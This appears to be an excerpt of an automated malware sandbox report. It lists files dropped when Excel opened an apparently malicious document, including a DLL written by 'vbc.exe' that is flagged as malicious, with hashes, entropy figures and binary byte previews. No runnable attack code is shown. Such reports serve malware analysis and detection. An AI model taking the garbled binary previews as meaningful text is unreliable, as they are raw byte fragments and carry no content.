                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C46ACE8.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):42465
                                                  Entropy (8bit):7.979580180885764
                                                  Encrypted:false
                                                  SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                  MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                  SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                  SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                  SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4950562D.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ED27E1E.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):68702
                                                  Entropy (8bit):7.960564589117156
                                                  Encrypted:false
                                                  SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                  MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                  SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                  SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                  SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7441E635.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):498420
                                                  Entropy (8bit):0.6413684157450645
                                                  Encrypted:false
                                                  SSDEEP:384:AigmXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:o4XwBkNWZ3cjvmWa+VDO
                                                  MD5:C3B5DFF8B9EE127AD59D202832626865
                                                  SHA1:1A24D45E300CEAEF01DADD2D8F6EAF147DC6404F
                                                  SHA-256:EEDBFD16A5391148EE0D9436C7F279792F44287B5C1B209EC08F2C1FF9DF5540
                                                  SHA-512:D22486A87C5ADD06A9BC4F17801AC62847F36AF588C0E8D742FA7B694679BA3A44B1074E56C2E8FBA62392EE287F3A3359218257087BA6FFBEE18201DEA9D0B6
                                                  Malicious:false
                                                  Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$........f.Y.@..%...t...................RQ/[....................$Q/[........ ...Id.Y........ .........@..d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......H....8.Y......@.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8CED6B0B.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):6364
                                                  Entropy (8bit):7.935202367366306
                                                  Encrypted:false
                                                  SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                  MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                  SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                  SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                  SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A43ECEB2.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2B50451.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):42465
                                                  Entropy (8bit):7.979580180885764
                                                  Encrypted:false
                                                  SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                  MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                  SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                  SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                  SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFDE5B87.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):14828
                                                  Entropy (8bit):7.9434227607871355
                                                  Encrypted:false
                                                  SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                  MD5:58DD6AF7C438B638A88D107CC87009C7
                                                  SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                  SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                  SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D55D75BF.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):19408
                                                  Entropy (8bit):7.931403681362504
                                                  Encrypted:false
                                                  SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                  MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                  SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                  SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                  SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBA4EB36.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):14828
                                                  Entropy (8bit):7.9434227607871355
                                                  Encrypted:false
                                                  SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                  MD5:58DD6AF7C438B638A88D107CC87009C7
                                                  SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                  SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                  SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                                  C:\Users\user\AppData\Local\Temp\aeu4t4jz55fz
                                                  Process:C:\Users\Public\vbc.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):217157
                                                  Entropy (8bit):7.993801883377394
                                                  Encrypted:true
                                                  SSDEEP:3072:Z5rcoq1haO8cJOqo7x8js2mUulY0IE3eDrQ6vm3SqCc5Z3vTwZb9mAWw:MZWOr2mjKUuGrQXiqCwB0ZmAWw
                                                  MD5:8B2633BD722157554485B344223F7AB0
                                                  SHA1:9D052A1F1AD4B8B603FEB19F4B6538FD174A57E7
                                                  SHA-256:72D2A78BEE650F416FBC21B150AEACA6B209354EF04E440E866FB00E8F1E4CF4
                                                  SHA-512:B010278B624C56D4A657633EF42DCB7872A8B8E9E069C7CFF9E3F920263B0B2049D083F7E42BB3B79810EAFB333CFFD13471C8B393111297EE4D9EF38E34E993
                                                  Malicious:false
                                                  Preview: ......D.1.:.....!.~..Q..&6=Z...4M.9.....Z.....0(._*..idn...E...^lz.U6.L.._%qJ..oB..P..u.7.m0.V.........qz|_.X..fm.....u...........$.....6.c..6m2 R..+.%.H....}..B....C.,.`..N3~kA...<..^4....3.#...J3 ?..q@...#.6.#.Y,vC^..T..Sp...>1MD......\..ikeb..D.1!m .....))..%.:..5As..4M.9....Z.....0(._*..idn...Ej..@l.8Q.../..*...?..[9....?)..6...8rn.w.tx.`|`........m.....`..^.s.&..C.1.Z,.%5.^...x.U... .^=....>.......ek..,.lb.N..bA...|.?^4........e..3@...q@...#...".Y.vC^..T...p...>1.D......\..-ktb..D.1._ .....))..%'....As!.4M.9.....Z.....0(._*..idn...Ej..@l.8Q.../..*...?..[9....?)..6...8rn.w.tx.`|`........m.....`..^.s.&..C.1.Z,.%5.^...x.U... .^=....>........C.,....N.ubA.}f|..^4........e..3 ...q@...#...".Y.vC^..T...p...>1.D......\..-ktb..D.1._ .....))..%'....As!.4M.9.....Z.....0(._*..idn...Ej..@l.8Q.../..*...?..[9....?)..6...8rn.w.tx.`|`........m.....`..^.s.&..C.1.Z,.%5.^...x.U... .^=....>........C.,....N.ubA.}f|..^4........e..3 ...q@...#...".Y.vC
                                                  C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll
                                                  Process:C:\Users\Public\vbc.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):112640
                                                  Entropy (8bit):6.281670409201876
                                                  Encrypted:false
                                                  SSDEEP:1536:PxDm0dxnCMCN2flHUJ+0ttATO6o6HjJ33chbu3jwKTYvsu0f2T2R+usephtcOo4L:Z0YGJNP6ophaTweYIAs+use/pMIr9
                                                  MD5:A55CE7F1CF8DF8B06A15140A3E9E3F9B
                                                  SHA1:5F787501F1D8B2A93D1DF6D5C91CDE0DD2BA14CE
                                                  SHA-256:B6A12BC611F92D3D793CE5C3C9CFF8A906CA96BD6B1D5C0DA8EBF9080FF4428A
                                                  SHA-512:544823425EE681ACF6FA08CEB4A64840A16317573F2D6B6C6E4559199164D92C3F599521AEA245340CC6C756ED808C1F4E2C131239BFDC67EE9AE376AEF8BA4D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Joe Sandbox View:
                                                  • Filename: vbc.exe, Detection: malicious, Browse
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F..P.}...}...}....$..}.../...}.../<..}.../..b}.......}...}..m}...#...}...#...}...#...}...#...}..Rich.}..........................PE..L......a...........!.....T...`...............p......................................................................@...L...........................................p...................................@............................................text....S.......T.................. ..`.bss....$....p...........................rdata..<H.......J...X..............@..@.data...\...........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF1395079B79D3B049.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF927638A277FFF96D.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DFEABD3D7DAA0E0CDA.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:CDFV2 Encrypted
                                                  Category:dropped
                                                  Size (bytes):234184
                                                  Entropy (8bit):7.970312526321275
                                                  Encrypted:false
                                                  SSDEEP:6144:yxNNFbveUPpgiOrpvu5LaIXWjBUnsP9UYTO17ENuja:aNrbveei5uJWjTFFUQNv
                                                  MD5:2CAAB2292B282E6A5DEA1CF78F84924A
                                                  SHA1:86F37C31091B15CCA135490A84EB52027BB1A4DF
                                                  SHA-256:4C84124C87CD46CE58A7A8208AD1674C4A270793F9A6158E80FD28F96B3CC844
                                                  SHA-512:70590F55C98C31FB7B2A95CB6D6B63917E1FA0F868C3AF852A805D45CBB176356A4B1DC1431EF908C680821730D0D02948956C03388FCEE6FCF6BBD661D55733
                                                  Malicious:false
